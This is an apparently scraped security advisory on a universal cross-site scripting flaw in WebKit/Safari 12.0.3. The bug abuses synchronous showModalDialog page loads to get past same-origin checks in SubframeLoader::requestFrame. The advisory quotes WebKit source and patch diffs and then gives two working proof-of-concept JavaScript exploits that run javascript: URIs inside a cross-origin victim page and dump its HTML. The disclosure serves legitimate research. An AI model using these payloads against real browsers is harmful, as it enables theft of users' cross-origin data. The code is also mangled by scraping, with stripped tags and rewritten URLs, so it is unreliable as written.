
Published on July 26th, 2019 📆 | 4653 Views ⚑


Universal Cross-Site Scripting due to Synchronous Page Loads

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As lokihardt@ has demonstrated in https://bugs.chromium.org/p/project-zero/issues/detail?id=1121,
WebKit's support of the obsolete `showModalDialog` method gives an attacker the ability to perform
synchronous cross-origin page loads. In certain conditions, this might lead to
time-of-check-time-of-use bugs in the code responsible for enforcing the Same-Origin Policy. In
particular, the original bug exploited a TOCTOU bug in `SubframeLoader::requestFrame` to achieve

(copied from lokihardt's report)
bool SubframeLoader::requestFrame(HTMLFrameOwnerElement& ownerElement, const String& urlString, const AtomicString& frameName, LockHistory lockHistory, LockBackForwardList lockBackForwardList)
    // Support for 
    URL scriptURL;
    URL url;
    if (protocolIsJavaScript(urlString)) {
        scriptURL = completeURL(urlString); // completeURL() encodes the URL.
        url = blankURL();
    } else
        url = completeURL(urlString);

    if (shouldConvertInvalidURLsToBlank() && !url.isValid())
        url = blankURL();

    Frame* frame = loadOrRedirectSubframe(ownerElement, url, frameName, lockHistory, lockBackForwardList); < script().executeIfJavaScriptURL(scriptURL); < script().executeIfJavaScriptURL(scriptURL);

It has stopped the original attack, but a year later https://bugs.webkit.org/show_bug.cgi?id=187203
was reported, which abused the HTML parser to bypass the added check. The problem was that
`isURLAllowed` didn't block `javascript:` URIs when the JavaScript execution context stack was
empty, i.e. when the `requestFrame` call was originating from the parser, so the exploit just needed
to make the parser insert an `iframe` element with a `javascript:` URI and use its `onload` handler
to load a cross-origin page inside `loadOrRedirectSubframe`.

As a result, another check has been added (see the comment below):
+    bool hasExistingFrame = ownerElement.contentFrame();
     Frame* frame = loadOrRedirectSubframe(ownerElement, url, frameName, lockHistory, lockBackForwardList);
     if (!frame)
         return false;
-    if (!scriptURL.isEmpty() && ownerElement.isURLAllowed(scriptURL))
+    // If we create a new subframe then an empty document is loaded into it synchronously and may
+    // cause script execution (say, via a DOM load event handler) that can do anything, including
+    // navigating the subframe. We only want to evaluate scriptURL if the frame has not been navigated.
+    bool canExecuteScript = hasExistingFrame || (frame->loader().documentLoader() && frame->loader().documentLoader()->originalURL() == blankURL());
+    if (!scriptURL.isEmpty() && canExecuteScript && ownerElement.isURLAllowed(scriptURL))

The second fix relies on the assumption that the parser can't trigger a `requestFrame` call for an
`iframe` element with an existing content frame. However, due to the way the node insertion
algorithm is implemented, it's possible to run JavaScript while the element's insertion is still in

static ALWAYS_INLINE void executeNodeInsertionWithScriptAssertion(ContainerNode& containerNode, Node& child,
    ContainerNode::ChildChangeSource source, ReplacedAllChildren replacedAllChildren, DOMInsertionWork doNodeInsertion)
    NodeVector postInsertionNotificationTargets;
        ScriptDisallowedScope::InMainThread scriptDisallowedScope;

        if (UNLIKELY(containerNode.isShadowRoot() || containerNode.isInShadowTree()))

        postInsertionNotificationTargets = notifyChildNodeInserted(containerNode, child);


    for (auto& target : postInsertionNotificationTargets)

Note that `HTMLFrameElementBase::didFinishInsertingNode` eventually calls `requestFrame`. So, if a
subtree which is being inserted contains multiple `iframe` elements, the first one can act as a
trigger for the JavaScript code that creates a content frame for another element right before its
`requestFrame` method is executed to bypass the `canExecuteScript` check. `isURLAllowed` again can
be tricked with the help of the HTML parser.

It's also worth noting that the `showModalDialog` method has to be triggered by a user gesture. On
the other hand, an attacker can't just wrap the exploit in a `click` event handler, as it would put
an execution context on the stack and make the `isURLAllowed` check fail. One way to overcome this
is to save a gesture token by performing an asynchronous load of a `javascript:` URI.

Safari 12.0.3 (14606.4.5)
WebKit r243998


Click anywhere

let counter = 0; function run() { if (++counter == 2) { parent_frame = frame.contentDocument.querySelector("iframe"); frame1 = parent_frame.appendChild(document.createElement("iframe")); frame2 = parent_frame.appendChild(document.createElement("iframe")); frame1.src = "http://www.exploit-db.com/javascript:top.runChild()"; } } let child_counter = 0; function runChild() { if (++child_counter == 2) { parent_frame.appendChild(frame2); a = frame2.contentDocument.createElement("a"); a.href = cache_frame.src; a.click(); showModalDialog(URL.createObjectURL(new Blob([` let intervalID = setInterval(() => { try { opener.frame.document.foo; } catch (e) { clearInterval(intervalID); window.close(); } }, 100); "], {type: "text/html"}))); frame2.src = "http://www.exploit-db.com/javascript:alert(document.documentElement.outerHTML)"; } } onclick = _ => { frame = document.body.appendChild(document.createElement("iframe")); frame.contentWindow.location = `javascript:'

'`; } cache_frame = document.body.appendChild(document.createElement("iframe")); cache_frame.src = "http://example.com/"; // victim page URL cache_frame.style.display = "none"; From WebKit's bugtracker: Unfortunately, even though the patch from https://trac.webkit.org/changeset/244892/webkit has blocked the original repro case because it relies on executing javascript: URIs synchronously, the underlying issue is still not fixed. Currently, `requestFrame` is implemented as follows: bool SubframeLoader::requestFrame(HTMLFrameOwnerElement& ownerElement, const String& urlString, const AtomicString& frameName, LockHistory lockHistory, LockBackForwardList lockBackForwardList) { [...] Frame* frame = loadOrRedirectSubframe(ownerElement, url, frameName, lockHistory, lockBackForwardList); // ***1*** if (!frame) return false; if (!scriptURL.isEmpty() && ownerElement.isURLAllowed(scriptURL)) { // FIXME: Some sites rely on the javascript:'' loading synchronously, which is why we have this special case. // Blink has the same workaround (https://bugs.chromium.org/p/chromium/issues/detail?id=923585). if (urlString == "javascript:''" || urlString == "javascript:""") frame->script().executeIfJavaScriptURL(scriptURL); else frame->navigationScheduler().scheduleLocationChange(ownerElement.document(), ownerElement.document().securityOrigin(), scriptURL, m_frame.loader().outgoingReferrer(), lockHistory, lockBackForwardList, stopDelayingLoadEvent.release()); // ***2*** } return true; } By the time the subframe loader schedules a JS URI load in [2], the frame might already contain a cross-origin victim page loaded in [1], so the JS URI might get executed in the cross-origin context. Updated repro:

Click anywhere

let counter = 0; function run(event) { ++counter; if (counter == 2) { event.target.src = "http://www.exploit-db.com/javascript:alert(document.documentElement.outerHTML)"; } else if (counter == 3) { frame = event.target; a = frame.contentDocument.createElement("a"); a.href = cache_frame.src; a.click(); showModalDialog(URL.createObjectURL(new Blob([` let intervalID = setInterval(() => { try { opener.frame.document.foo; } catch (e) { clearInterval(intervalID); window.close(); } }, 100); "], {type: "text/html"}))); } } onclick = _ => { frame = document.body.appendChild(document.createElement("iframe")); frame.contentWindow.location = `javascript:'

'`; } cache_frame = document.body.appendChild(document.createElement("iframe")); cache_frame.src = "http://example.com/"; // victim page URL cache_frame.style.display = "none"; I'd recommend you consider applying a fix similar to the one that the Blink team has in https://cs.chromium.org/chromium/src/third_party/blink/renderer/core/html/html_frame_element_base.cc?rcl=d3f22423d512b45466f1694020e20da9e0c6ee6a&l=62, i.e. using the frame's owner document as a fallback for the security check.


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